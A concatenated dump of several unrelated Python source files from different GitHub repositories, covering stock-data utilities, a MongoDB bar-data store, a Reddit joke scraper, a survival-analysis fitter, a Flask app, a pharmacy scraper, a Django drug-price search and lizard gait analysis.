adjust = 'qfq'
elif adjust in ['02', 'hfq', 'after']:
adjust = 'hfq'
else:
adjust = None
# 空值
if not v:
return pd.DataFrame(data=[])
# DataFrame
if isinstance(v, DataFrame):
result = v
# 列表
elif isinstance(v, list):
result = pd.DataFrame(data=v) if len(v) else None
# 字典
elif isinstance(v, dict):
result = pd.DataFrame(data=[v])
# 空值
else:
result = pd.DataFrame(data=[])
if adjust and adjust in ['qfq', 'hfq'] and symbol:
from jotdx.utils.adjust import to_adjust
result['code'] = symbol
result = to_adjust(result, symbol=symbol, client=client, adjust=adjust)
if 'datetime' in result.columns:
result.index = pd.to_datetime(result.datetime)
elif 'date' in result.columns:
result.index = pd.to_datetime(result.date)
if 'vol' in result.columns:
result['volume'] = result.vol
return result
def to_file(df, filename=None):
"""
根据扩展名输出文件
:param df: pd.DataFrame
:param filename: 要输出的文件,支持 csv, xlsx, xls, json, h5
:return: bool
"""
if filename is None or df is None:
return None
path_name = Path(filename).parent
extension = Path(filename).suffix
# 目录不存在创建目录
Path(path_name).is_dir() or Path(path_name).mkdir(parents=True)
# methods = {'to_json': ['.json']}
# method = [k for k, v in methods if extension in v][0]
# getattr(pd, method)(filename)
if extension == '.csv':
return df.to_csv(filename, encoding='utf-8', index=False)
if extension == '.xlsx' or extension == '.xls':
# openpyxl, xlwt
return df.to_excel(filename, index=False)
if extension == '.h5':
# tables
return df.to_hdf(filename, 'df', index=False)
if extension == '.json':
return df.to_json(filename, orient='records')
return None
class TqdmUpTo(tqdm):
"""
Provides `update_to(n)` which uses `tqdm.update(delta_n)`.
"""
total: object = 0
def update_to(self, downloaded=0, total_size=None):
"""
b : int, optional
Number of blocks transferred so far [default: 1].
bsize : int, optional
Size of each block (in tqdm units) [default: 1].
tsize : int, optional
Total size (in tqdm units). If [default: None] remains unchanged.
"""
if total_size is not None:
self.total = total_size
self.update(downloaded - self.n) # will also set self.n = b * bsize
def get_config_path(config='config.json'):
"""
获取配置文件路径
:param config: 配置文件名称
:return: filename
"""
filename = Path.home() / '.mootdx' / config
pathname = Path(filename).parent
Path(pathname).exists() or Path(pathname).mkdir(parents=True)
# Path(filename).exists() or Path(filename).write_text('None')
return str(filename)
FREQUENCY = ['5m', '15m', '30m', '1h', 'days', 'week', 'mon', 'ex_1m', '1m', 'day', '3mon', 'year']
def get_frequency(frequency) -> int:
# FREQUENCY = ['5m', '15m', '30m', '1h', 'day', 'week', 'mon', '1m', '1m', 'day', '3mon', 'year']
try:
if isinstance(frequency, str):
frequency = FREQUENCY.index(frequency)
except ValueError:
frequency = 0
return frequency
``` |
{
"source": "jojoquant/vnpy_jomongodb",
"score": 2
} |
#### File: vnpy_jomongodb/vnpy_jomongodb/mongo.py
```python
import numpy as np
import pandas as pd
from datetime import datetime
from typing import Union, List
from vnpy_mongodb import Database
from vnpy.trader.constant import Exchange, Interval
class JoMongodbDatabase(Database):
def __init__(self) -> None:
super(JoMongodbDatabase, self).__init__()
self.bar_collection_name = "bar_data"
self.tick_collection_name = "tick_data"
def load_bar_df(
self,
symbol: Union[str, List[str]],
exchange: Union[Exchange, List[Exchange]],
interval: Union[Interval, List[Interval]],
start: datetime = None,
end: datetime = None,
table: str = None,
) -> pd.DataFrame:
'''
symbol, exchange, interval = "128079", Exchange.SSE, Interval.MINUTE_5
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], Interval.DAILY
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], [Interval.DAILY, Interval.MINUTE_5]
df = dd.load_bar_df(symbol, exchange, interval)
'''
datetime_start = {"$gte": start} if start else {}
datetime_end = {"$lte": end} if end else {"$lte": datetime.now()}
db = self.client[self.database]
collection = db[table] if table is not None else db[self.bar_collection_name]
query = (
{
"symbol": symbol if isinstance(symbol, str) else {'$in': symbol},
"exchange": exchange.value if isinstance(exchange, Exchange) else {'$in': [e.value for e in exchange]},
"interval": interval.value if isinstance(interval, Interval) else {'$in': [i.value for i in interval]},
"datetime": {**datetime_start, **datetime_end}
},
{'_id': 0}
)
return pd.json_normalize(list(collection.find(*query)))
def save_bar_df(self, df, table: str = None, callback=None):
'''
df的datetime如果没有tzinfo, 为了统一, 最好设置一下,
例如: df['datetime'] = df['datetime'].tz_localize(DB_TZ)
:param df:
:param table: 可以指定新的表名, 进行分表存储, 替代默认的 "bar_data"
:param callback: 用于回显当前存储进度
:return:
'''
if len(df) == 0:
return
# 按照 datetime 升序, 即由上到下, 由远及近排序
df.sort_values(by=['datetime'], inplace=True)
db = self.client[self.database]
collection = db[self.bar_collection_name] if table is None else db[table]
my_list = df.to_dict('records')
# 这里封装的 for 主要是为了 callback 进度条显示
n_rows = len(my_list)
chunk_size = round(n_rows / 10) # 暂时设置数据分段为10
for i in range(int(n_rows / chunk_size) + 1):
start_i = i * chunk_size
end_i = min((i + 1) * chunk_size, n_rows)
if start_i >= end_i:
break
collection.insert_many(my_list[start_i:end_i])
if callback is not None:
callback(n_rows, start_i)
symbol = my_list[0]["symbol"]
exchange = my_list[0]["exchange"]
interval = my_list[0]["interval"]
# 更新汇总
overview_filter = {
"symbol": symbol,
"exchange": exchange,
"interval": interval
}
overview = self.overview_collection.find_one(overview_filter)
start_datetime = my_list[0]["datetime"].to_pydatetime()
end_datetime = my_list[-1]["datetime"].to_pydatetime()
if not overview:
overview = {
"symbol": symbol,
"exchange": exchange,
"interval": interval,
"count": len(my_list),
"start": start_datetime,
"end": end_datetime
}
else:
overview["start"] = min(start_datetime, overview["start"])
overview["end"] = max(end_datetime, overview["end"])
# TODO 这里以后注意分表的时候, 数据量的更新问题
overview["count"] = self.bar_collection.count_documents(overview_filter)
self.overview_collection.update_one(overview_filter, {"$set": overview}, upsert=True)
return True
def get_groupby_df(self, table: str = None) -> pd.DataFrame:
db = self.client[self.database]
collection = db[self.bar_collection_name] if table is None else db[table]
query = [
{
"$group": {
"_id": {"exchange": "$exchange", "interval": "$interval", "symbol": "$symbol"},
"count": {"$sum": 1}
}
}
]
return pd.json_normalize(
list(collection.aggregate(query))
).rename(
columns={
"_id.exchange": "exchange",
"_id.interval": "interval",
"_id.symbol": "symbol",
"count": "count(1)",
}
)
def get_end_date(self, symbol: str, exchange: Exchange, interval: Interval) -> np.datetime64:
# sql = f'''select * from dbbardata
# where symbol='{symbol}' and exchange='{exchange}' and interval='{interval}'
# order by datetime desc limit 1;
# '''
df = self.get_sorted_date_df(symbol, exchange, interval, ascend=False)
return df['datetime'].values[0]
def get_start_date(self, symbol: str, exchange: Exchange, interval: Interval) -> np.datetime64:
# sql = f'''select * from dbbardata
# where symbol='{symbol}' and exchange='{exchange}' and interval='{interval}'
# order by datetime asc limit 1;
# '''
df = self.get_sorted_date_df(symbol, exchange, interval, ascend=True)
return df['datetime'].values[0]
def get_sorted_date_df(self, symbol: str, exchange: Exchange, interval: Interval, ascend=True,
table: str = None) -> pd.DataFrame:
ascend = 1 if ascend else -1
db = self.client[self.database]
collection = db[self.bar_collection_name] if table is None else db[table]
query = (
{"symbol": symbol, "exchange": exchange.value, "interval": interval.value},
{'_id': 0}
)
return pd.json_normalize(
list(
collection.find(*query).sort([("datetime", ascend)]).limit(1)
)
)
if __name__ == '__main__':
symbol, exchange, interval = "RBL8", Exchange.SHFE, Interval.MINUTE_5
dd = JoMongodbDatabase()
# start_date = dd.get_start_date(symbol, exchange, interval)
# end_date = dd.get_end_date(symbol, exchange, interval)
# grb_df = dd.get_groupby_df()
symbol, exchange, interval = "128079", Exchange.SSE, Interval.MINUTE_5
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], Interval.DAILY
symbol, exchange, interval = ["110038", "110043", "128079"], [Exchange.SSE, Exchange.SZSE], [Interval.DAILY,
Interval.MINUTE_5]
df = dd.load_bar_df(symbol, exchange, interval)
# dd.save_bar_df(df)
print(1)
``` |
{
"source": "jojordan3/dad-joke-ai",
"score": 3
} |
#### File: jojordan3/dad-joke-ai/pipeline.py
```python
import pandas as pd
import re
import psycopg2
import sys
from subreddits.pushshift import *
from datetime import datetime as dt
from datetime import timedelta as td
from datetime import timezone as tz
joke_file_base = 'data_%%%%.csv'
record_file_base = 'data_%%%%.txt'
base_URL = 'https://api.pushshift.io/reddit/submission/search/?q=&size=1000&\
subreddit=%%%%&'
score_cats = [1, 5, 20, 100]
comment_cats = [1, 3, 10, 50]
newlines = re.compile(r'(\\n)+')
def _gettext(s):
s = s.replace('&#x200B;', '')
s = s.replace('&', 'and')
s = newlines.sub(' ', s)
return s
def prepare_text(data):
data.title.fillna('', inplace=True)
data.selftext.fillna('', inplace=True)
data['title_clean'] = data.title.apply(_gettext)
data['selftext_clean'] = data.selftext.apply(_gettext)
data['score_cat'] = data.score.apply(lambda _: _categorize(_, score_cats))
data['comment_cat'] = data.comments.apply(
lambda _: _categorize(_, comment_cats))
data['createdUTC'] = data.createdUTC.apply(
lambda x: dt.fromtimestamp(x, tz.utc))
return data
def _categorize(val, cutoffs):
for level, upper_bound in enumerate(cutoffs):
if val < upper_bound:
return level
return len(cutoffs)
def _create_table(cur, sr):
cur.execute(f"""CREATE TABLE {sr} (
postid varchar(8) PRIMARY KEY,
created timestamptz,
prev_created varchar(20),
author varchar(40),
title text,
selftext text,
score int,
comments int,
scorecat smallint,
commentcat smallint);""")
def _add_rows(conn, sr, ordered_vals):
with conn.cursor() as cur:
data_str = b','.join([cur.mogrify(
"(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
v) for v in ordered_vals]).decode()
cur.execute(f"""INSERT INTO {sr}
(postid, created, prev_created, author, title, selftext, score,
comments, scorecat, commentcat) VALUES """ + data_str + ';')
conn.commit()
def _update_rows(conn, sr, ordered_vals):
with conn.cursor() as cur:
cur.execute("""CREATE TEMP TABLE tempvals(
postid varchar(8),
score int,
comments int,
scorecat smallint,
commentcat smallint);""")
data_str = b','.join(cur.mogrify(
"(%s, %s, %s, %s, %s)", v) for v in ordered_vals).decode()
cur.execute(f"""INSERT INTO tempvals (
postid, score, comments, scorecat, commentcat)
VALUES """ + data_str +';')
cur.execute(f"""UPDATE {sr} j
SET (score, comments, scorecat, commentcat) =
(SELECT score, comments, scorecat, commentcat
FROM tempvals t WHERE t.postid = j.postid);""")
conn.commit()
def read_or_create_table(sr):
with psycopg2.connect('dbname=postgres user=postgres') as conn:
with conn.cursor() as cur:
try:
cur.execute(f"SELECT MAX(created) FROM {sr};")
except psycopg2.Error:
conn.rollback()
_create_table(cur, sr)
conn.commit()
last_post_time = None
else:
last_post_time = cur.fetchone()[0]
conn.close()
return last_post_time
def update_db(sr, start=None):
try:
ago = (start - td(days=100))
UTC = int(ago.replace(tzinfo=tz.utc).timestamp())
except:
UTC = int(1319397000)
num_subs = 1000
while num_subs == 1000:
data = get_list(base_URL, 'after', UTC, sr)
UTC, parsed, num_subs = parse_joke(data, 'sql', sr)
df = pd.DataFrame(data=parsed, index=None, columns=[
'id', 'createdUTC', 'parent_createdUTC', 'author',
'title', 'selftext', 'score', 'comments'
])
df = prepare_text(df)
with psycopg2.connect("dbname=postgres user=postgres") as conn:
with conn.cursor() as cur:
q = cur.mogrify(f"""SELECT postid, score, comments, scorecat,
commentcat FROM {sr} WHERE postid IN %s;""",
(tuple(df.id.values),))
cur.execute(q)
to_update = []
try:
overlap = cur.fetchall()
except:
pass
else:
repeat_rows = df.id.isin([i[0] for i in overlap])
sec = [tuple(x) for x in df[repeat_rows][[
'id', 'score', 'comments', 'score_cat', 'comment_cat']].values]
if len(sec) > 0:
to_update = []
for i, row in enumerate(sec):
if list(overlap[i]) != row:
to_update.append(row)
if len(to_update) > 0:
_update_rows(conn, sr, to_update)
df = df.drop(index=df[repeat_rows].index)
finally:
ordered_vals = df.apply(lambda row: tuple(
row[['id', 'createdUTC', 'parent_createdUTC', 'author',
'title_clean', 'selftext_clean', 'score', 'comments',
'score_cat', 'comment_cat']]), axis=1)
if len(df) > 0:
_add_rows(conn, sr, ordered_vals)
conn.commit()
conn.close()
last_datetime = dt.fromtimestamp(UTC, tz.utc)
time_str = last_datetime.strftime('%Y-%m-%d %H:%M:%S')
print(f'Updated {len(to_update)}, Added {len(df)}, End {time_str} (UTC: {str(UTC)})')
if __name__ == "__main__":
try:
subreddit = sys.argv[1]
except:
while True:
subreddit = input(f'Which subreddit would you like to search? ')
finally:
time_s = read_or_create_table(subreddit)
update_db(subreddit, start=time_s)
``` |
{
"source": "jojordan3/lifelines",
"score": 3
} |
#### File: lifelines/fitters/breslow_fleming_harrington_fitter.py
```python
from __future__ import print_function
import numpy as np
from lifelines.fitters import UnivariateFitter
from lifelines import NelsonAalenFitter
from lifelines.utils import median_survival_times
class BreslowFlemingHarringtonFitter(UnivariateFitter):
"""
Class for fitting the Breslow-Fleming-Harrington estimate for the survival function. This estimator
is a biased estimator of the survival function but is more stable when the popualtion is small and
there are too few early truncation times, it may happen that is the number of patients at risk and
the number of deaths is the same.
Mathematically, the NAF estimator is the negative logarithm of the BFH estimator.
BreslowFlemingHarringtonFitter(alpha=0.95)
Parameters
----------
alpha: float
The alpha value associated with the confidence intervals.
"""
def fit(
self,
durations,
event_observed=None,
timeline=None,
entry=None,
label="BFH_estimate",
alpha=None,
ci_labels=None,
): # pylint: disable=too-many-arguments
"""
Parameters
----------
duration: an array, or pd.Series, of length n
duration subject was observed for
timeline:
return the best estimate at the values in timelines (postively increasing)
event_observed: an array, or pd.Series, of length n
True if the the death was observed, False if the event was lost (right-censored). Defaults all True if event_observed==None
entry: an array, or pd.Series, of length n
relative time when a subject entered the study. This is
useful for left-truncated observations, i.e the birth event was not observed.
If None, defaults to all 0 (all birth events observed.)
label: string
a string to name the column of the estimate.
alpha: float
the alpha value in the confidence intervals. Overrides the initializing
alpha for this call to fit only.
ci_labels: iterable
add custom column names to the generated confidence intervals
as a length-2 list: [<lower-bound name>, <upper-bound name>]. Default: <label>_lower_<alpha>
Returns
-------
self, with new properties like 'survival_function_'.
"""
self._label = label
alpha = alpha if alpha is not None else self.alpha
naf = NelsonAalenFitter(alpha)
naf.fit(
durations, event_observed=event_observed, timeline=timeline, label=label, entry=entry, ci_labels=ci_labels
)
self.durations, self.event_observed, self.timeline, self.entry, self.event_table = (
naf.durations,
naf.event_observed,
naf.timeline,
naf.entry,
naf.event_table,
)
# estimation
self.survival_function_ = np.exp(-naf.cumulative_hazard_)
self.confidence_interval_ = np.exp(-naf.confidence_interval_)
self.median_ = median_survival_times(self.survival_function_)
# estimation methods
self._estimation_method = "survival_function_"
self._estimate_name = "survival_function_"
self._predict_label = label
self._update_docstrings()
# plotting functions
self.plot_survival_function = self.plot
return self
``` |
{
"source": "jojordan3/LSDS-Flask-MiniApp",
"score": 3
} |
#### File: LSDS-Flask-MiniApp/flask_miniapp/app.py
```python
from flask import Flask, render_template, request
from .models import DB, User, Tweet
from decouple import config
def create_app():
'''Create and configure an instance of the Flask application
'''
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = config(DATABASE_URL)
app.config['SQLALCHEMY_TRACK_MODIFICATION'] = False
app.config['ENV'] = config('ENV')
DB.init_app(app)
@app.route('/')
def root():
# auto searches templates folder
users = User.query.all()
return render_template('base.html', title='Home', users=users)
@app.route('/reset')
def reset():
DB.drop_all()
DB.create_all()
return render_template('base.html', title='Databse Reset', users=[])
return app
``` |
{
"source": "jojordan3/prescription-search-django",
"score": 3
} |
#### File: supplementary_data/scraping_pharms/from_bcbs_pdf.py
```python
from tabula import read_pdf
import sys
import os
import pandas as pd
# Includes Washington DC, Puerto Rico, and Virgin Islands
# Orig taken from
# https://gist.github.com/bubblerun/a624de5b4fa8ff0980010054a7220977
states = ['AL', 'AK', 'AZ', 'AR', 'CA', 'CO', 'CT', 'DE', 'DC', 'FL', 'GA',
'HI', 'ID', 'IL', 'IN', 'IA', 'KS', 'KY', 'LA', 'ME', 'MD', 'MA',
'MI', 'MN', 'MS', 'MO', 'MT', 'NE', 'NV', 'NH', 'NJ', 'NM', 'NY',
'NC', 'ND', 'OH', 'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN',
'TX', 'UT', 'VT', 'VI', 'VA', 'WA', 'WV', 'WI', 'WY']
obj_length = len(states) # For progress bar
# Link to PDF files - state abbreviation replaces @@
l = f'https://www.bcbsri.com/BCBSRIWeb/pdf/state_pharmacies/@@_PHARMACIES.pdf'
dir_path = os.path.dirname(os.path.abspath(__file__)) # Directory path to save
# For pandas df
option = {'names': ['PharmacyNumber', 'PharmacyNPI', 'PharmacyName',
'PharmacyStreetAddress1', 'PharmacyCity', 'PharmacyState',
'PharmacyZip', 'other1', 'other2'],
'header': None, 'dtype': str, 'index_col': False}
def progressbar(i, current):
'''Simple progress bar'''
width = 55
if i == 0:
sys.stdout.write(f"Progress: [>{' ' * (width - 1)}] 0.0%")
sys.stdout.flush()
sys.stdout.write('\b' * 4)
else:
progress = int(width * i / obj_length)
percent = i * 100 / obj_length
if progress > current:
sys.stdout.write('\r')
sys.stdout.write(f"Progress: \
[{'=' * progress}>{' ' * (width - progress - 1)}] {percent:.1f}%")
sys.stdout.flush()
else:
sys.stdout.write(f'{percent:.1f}%')
sys.stdout.flush()
sys.stdout.write('\b' * len(f'{percent:.1f}%'))
i += 1
progress = current
return i, progress
def get_bcbs_info(save_to_path):
'''Get data from all stated covered by BlueCross BlueShield'''
pharmacies = []
i = 0
progress = 0
obj_length = len(states)
for state in states[0:1]:
i, progress = progressbar(i, progress)
df = read_pdf(l.replace('@@', state), pandas_options=option)
df = df.drop(columns=['other1', 'other2'])
pharmacies.append(df)
bcbs_pharms = pd.concat(pharmacies, ignore_index=True)
bcbs_pharms.to_csv(save_to_path)
print('File saved to :' + save_to_path)
if __name__ == "__main__":
get_bcbs_info(dir_path + '/bcbspharms.csv')
```
#### File: local_deploy/rx_info/search_functions.py
```python
from .models import RxClaim, PharmacyInfo, BrandToGeneric, ZipCodeInfo
import pandas as pd
from django_pandas.io import read_frame
from geopy.distance import distance as gdist
import psycopg2
def search_by_pharm(drug, zipcode):
drug = generic(drug)
try:
qs = RxClaim.objects.filter(pharmacyid__PharmacyZip__in=[zipcode,
'XXXXX'],
DrugLabelName__contains=drug)
df = qs.to_pivot_table(rows=['PharmacyID'], values='UnitCost',
aggfunc='np.mean')
return df.sort_values(by='UnitCost')
except DoesNotExist:
try:
zipcodes = get_nearby(zipcode)
qs = RxClaim.objects.filter(pharmacyid__PharmacyZip__in=[zipcodes],
DrugLabelName__contains=drug)
df = qs.to_pivot_table(rows=['PharmacyID'], values='UnitCost',
aggfunc='np.mean')
return df.sort_values(by='DrugLabelName')[:5]
except:
raise
def get_pharm_info(pharmID):
return read_frame(PharmacyInfo.objects.filter(pk__in=[pharmID]),
index_col='PharmacyID')
def search_by_pbm(self, drug):
drug = generic(drug)
try:
qs = RxClaim.objects.filter(DrugLabelName__contains=drug)
df = qs.to_pivot_table(rows=['PBMVendor'],
values='UnitCost', aggfunc='np.mean')
return df.sort_values(by='UnitCost')[:5]
except DoesNotExist:
raise
def generic(drug):
try:
med = BrandToGeneric.objects.get(Brand__contains=drug)
generic = med.values('Generic')
except DoesNotExist:
try:
med = BrandToGeneric.objects.get(Generic__contains=drug)
generic = med.values('Generic')
except DoesNotExist:
raise
finally:
return generic
def get_nearby(zipcode):
try:
zc = ZipCodeInfo.objects.get(pk=zipcode)
lat_ = zc.value('latitude')
long_ = zc.value('longitude')
qs = ZipCodeInfo.objects.filter(latitude__range=((lat_ - 0.03),
(lat_ + 0.03)),
longitude__range=((long_ - 0.03),
(long_ + 0.03)))
zipcodes = qs.values_list('zipcode', flat=True)
return zipcodes
except DoesNotExist:
raise
``` |
{
"source": "JojoReikun/ClimbingLizardDLCAnalysis",
"score": 2
} |
#### File: lizardanalysis/calculations/aep_pep_2.py
```python
def footfall_by_switches(**kwargs):
# TODO: make low-pass filter optional, if don't use, use footfall smooth directly
import os.path
import pandas as pd
from pathlib import Path
from lizardanalysis.utils import animal_settings
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
config = kwargs.get('config')
filename = kwargs.get('filename')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
config_file = Path(config).resolve()
# result folder for footfall plots
step_detection_folder = os.path.join(str(config_file).rsplit(os.path.sep, 1)[0], "analysis-results",
"step_detection")
# create file path for foot fall pattern diagrams
plotting_footfall_folder = os.path.join(step_detection_folder, "footfall-pattern-diagrams")
# TODO: instead of hard-coding the feet and the three points for body_motion,
# TODO: let the user choose based on labels available in DLC result file: Choose feet & choose body motion
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
relative = False
plotting_footfall_patterns = True
# define cut-off value -> crops X% of frames on each side of video:
p_cut_off = 0.05
# read in all the frames for hip, spine and shoulder (x) to get mean body motion
body_motion = {"frame": [], "mean_motion_x": []}
head_diff = 0
ab_diff = 0
for row in range(1, data_rows_count):
# go through frames and extract the x-diff for body-axis labels; take the mean and store in dict
# filter for likelihood, add new shoulder_diff if likelihood is good, else use last value:
if data.loc[row][scorer, "head", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "head", 'likelihood'] >= 0:
head_diff = data.loc[row][scorer, "head", 'x'] - data.loc[row - 1][scorer, "head", 'x']
if data.loc[row][scorer, "abdomen", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "abdomen", 'likelihood'] >= likelihood:
ab_diff = data.loc[row][scorer, "abdomen", 'x'] - data.loc[row - 1][scorer, "abdomen", 'x']
body_motion['frame'].append(row - 1)
body_motion['mean_motion_x'].append((head_diff + ab_diff) / 2.0)
# one class instance and one result array for every foot, because every foot needs own counter
calculators = {}
results = {}
# for every foot:
foot_motions = {}
rel_foot_motions = {}
for foot in feet:
foot_motions[f"{foot}"] = []
rel_foot_motions[f"rel_{foot}"] = []
# read in all frames (x) differences: if moving forward = pos, if moving backwards = neg
foot_motion = 0
for row in range(1, data_rows_count):
# if likelihood is worse than set value, last foot_motion will be used
if data.loc[row][scorer, f"{foot}", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, f"{foot}", 'x'] >= likelihood:
foot_motion = data.loc[row][scorer, f"{foot}", 'x'] - data.loc[row - 1][scorer, f"{foot}", 'x']
# foot motion
foot_motions[f"{foot}"].append(foot_motion)
# foot motion - body motion
rel_foot_motions[f"rel_{foot}"].append(foot_motion - body_motion['mean_motion_x'][row - 1])
# print('foot_motions: ', foot_motions)
# create dataframe with >> frame | body_motion | rel_foot_motion << for current foot
dict_df = {'body_motion': body_motion['mean_motion_x'],
'foot_motion': foot_motions[f"{foot}"],
'rel_foot_motion': rel_foot_motions[f"rel_{foot}"]}
df = pd.DataFrame.from_dict(dict_df)
# print("df: ", df)
# gets a dict with x-values and the sign for switch in swing and stance phases (after smoothing data)
# change in sign: positive to body = swing, negative to body = stance
intersections = smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename, step_detection_folder)
# print(f"intersections for foot {foot}: ", intersections)
# initializes class instance for every foot and empty result dict to be filled with the swing and stance phases:
calculators[foot] = StridesAndStances()
# "S10" = string of 10 characters: stance/stride + counter 000n
results[foot] = calculators[foot].determine_stride_phases(intersections, data_rows_count)
# rename dictionary keys of results
results = {'stepphase_' + key: value for (key, value) in results.items()}
# print("results: ", results)
if plotting_footfall_patterns:
""" plots a foot fall pattern diagram for every DLC result csv file/every lizard run """
plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder)
return results
def smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename, step_detection_folder, plotting=True):
"""
Smooths the raw input data from foot motion and body motion, using a Butterworth low-pass filter and a
Savintzky-Golay smoothing algorithm. Then computes the intersection points betw. the smoothed body and foot curves.
If relative is True, body motion is already subtracted from the foot motion, hence foot is relative to the x-axis.
If relative is False, intersection between foot motion and body motion is determined.
If plotting is True: plots the footfall and body motion curves, and the intersection points between the
smoothed curve and the x-axis (switch betw. swing and stance phase)
return: dictionary which contains a list with x-values (frames) of intersection points and responding signs +1 or -1
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
import os
import errno
# determine p_cutoff position:
x_cutoff_value = int(round(data_rows_count * p_cut_off, 0))
# add low pass filter to cut off spikes in data:
# Butterworth filter
x = np.linspace(0, data_rows_count - 1, data_rows_count - 1)
b, a = signal.butter(3, 0.1, btype='lowpass', analog=False)
x_cutoff = np.linspace(x_cutoff_value, data_rows_count - 1, int(data_rows_count - 1 - x_cutoff_value))
if plotting == True:
# initiate plot
plt.figure()
plt.axvline(x_cutoff_value, color='black', label='cutoff 0.05%')
if relative == True:
"""
Uses the footmotion from which body motion has been substracted, hence body-motion is the x-axis.
Note: intersection points for the lizard standing won't be excluded with this method. Use relative==False.
"""
# lowpass filter for foot motion
rel_foot_motion_low_passed = signal.filtfilt(b, a, df['rel_foot_motion'])
# smooth curves:
# Savitzky-Golay filter
y_foot_rel = df.loc[x_cutoff_value:, 'rel_foot_motion']
y_foot_rel_lp = rel_foot_motion_low_passed[x_cutoff_value:]
# smooth original foot motion without low pass filter
y_foot_rel_smoothed = signal.savgol_filter(y_foot_rel, 17, 3)
# smooth low-pass-filtered rel foot motion
y_foot_rel_lp_smoothed = signal.savgol_filter(y_foot_rel_lp, 17, 3)
# compute and plot intersection points:
x_axis_f = np.zeros(data_rows_count - 1 - x_cutoff_value)
idx = np.argwhere(np.diff(np.sign(x_axis_f - y_foot_rel_lp_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
for i in idx:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(x_axis_f[i] - y_foot_rel_lp_smoothed[i]))
intersections_dict['idx'] = [b + x_cutoff_value for b in intersections_dict['idx']]
# print("x intersections: ", intersections_dict)
# remove intersection points when lizard has stopped walking:
# intersections_dict = remove_standing_intersections(intersections_dict, x_axis_f, y_foot_rel_lp_smoothed)
if plotting == True:
df['rel_foot_motion'].plot(color='#f5c242') # plot rel_foot
plt.plot(x, rel_foot_motion_low_passed, color='green', label='rel_foot_motion low pass (lp) filter')
plt.plot(x_cutoff, y_foot_rel_smoothed, color='red', label='rel_foot_motion_smoothed')
plt.plot(x_cutoff, y_foot_rel_lp_smoothed, color='lightgreen', label='rel_foot_motion_lp_smoothed')
plt.plot(x_cutoff[idx], x_axis_f[idx], 'ko') # plot intersection points
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cutoff[intersections_dict['idx'][i] - x_cutoff_value] - 5,
x_axis_f[intersections_dict['idx'][i] - x_cutoff_value] + 3))
else:
"""
Uses the foot motion and the body motion and computes the intersection points for the smoothed curves.
Intersection points for the lizard standing (bodymotion -> 0) will get excluded by using a body-motion threshold
of 10% of max(body_motion_lp_smoothed).
"""
# lowpass filter for body motion
body_motion_low_passed = signal.filtfilt(b, a, df['body_motion'])
# lowpass filter for foot motion
foot_motion_low_passed = signal.filtfilt(b, a, df['foot_motion'])
# smooth curves:
y_body = df.loc[x_cutoff_value:, 'body_motion']
y_body_lp = body_motion_low_passed[x_cutoff_value:]
y_foot = df.loc[x_cutoff_value:, 'foot_motion']
y_foot_lp = foot_motion_low_passed[x_cutoff_value:]
# smooth original body motion without low pass filter
y_body_smoothed = signal.savgol_filter(y_body, 51, 3)
# smooth low-pass-filtered body motion
y_body_lp_smoothed = signal.savgol_filter(y_body_lp, 17, 3)
# smooth original foot motion without low pass filter
y_foot_smoothed = signal.savgol_filter(y_foot, 17, 3)
# smooth low-pass-filtered rel foot motion
y_foot_lp_smoothed = signal.savgol_filter(y_foot_lp, 17, 3)
# compute and plot intersection points:
idx = np.argwhere(np.diff(np.sign(y_body_lp_smoothed - y_foot_lp_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
max_body_motion = max([abs(max(y_body_lp_smoothed)), abs(min(y_body_lp_smoothed))])
body_motion_stand = round(max_body_motion * 0.1, 2)
# print(f"max body motion: {max_body_motion}, 10%: {body_motion_stand}")
for i in idx:
# exclude all intersections which are within 0+-1% of max body motion (~standing)
if abs(y_body_lp_smoothed[i]) >= body_motion_stand:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(y_body_lp_smoothed[i] - y_foot_lp_smoothed[i]))
intersections_dict['idx'] = [b + x_cutoff_value for b in intersections_dict['idx']]
# print("x intersections: ", intersections_dict)
# remove intersection points when lizard has stopped walking (usually in the end):
# intersections_dict = remove_standing_intersections(intersections_dict, y_body_lp_smoothed, y_foot_lp_smoothed)
if plotting == True:
df['body_motion'].plot(color='#3089db') # plot body motion
df['foot_motion'].plot(color='#d68f00') # plot foot motion
plt.plot(x, body_motion_low_passed, color='lightblue', label='body_motion low pass (lp) filter')
plt.plot(x, foot_motion_low_passed, color='green', label='foot_motion low pass (lp) filter')
plt.plot(x_cutoff, y_body_smoothed, color='#160578', label='body_motion_smoothed')
plt.plot(x_cutoff, y_foot_smoothed, color='red', label='foot_motion_smoothed')
plt.plot(x_cutoff, y_body_lp_smoothed, color='#9934b3', label='body_motion_lp_smoothed')
plt.plot(x_cutoff, y_foot_lp_smoothed, color='lightgreen', label='foot_motion_lp_smoothed')
plt.plot(x_cutoff[idx], y_body_lp_smoothed[idx], 'ko') # plot intersection points
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cutoff[intersections_dict['idx'][i] - x_cutoff_value] - 5,
y_body_lp_smoothed[intersections_dict['idx'][i] - x_cutoff_value] + 3))
if plotting == True:
# set y-limits, add legend and display plots
plt.axhline(0, color='black')
plt.ylim(-30, 30)
plt.legend()
plt.xlabel('frames')
plt.ylabel('dx/frame')
filename_title = filename.split("_", 2)[:2]
filename_title = filename_title[0] + filename_title[1]
plt.title(f"{filename_title}-{foot}")
# plt.show()
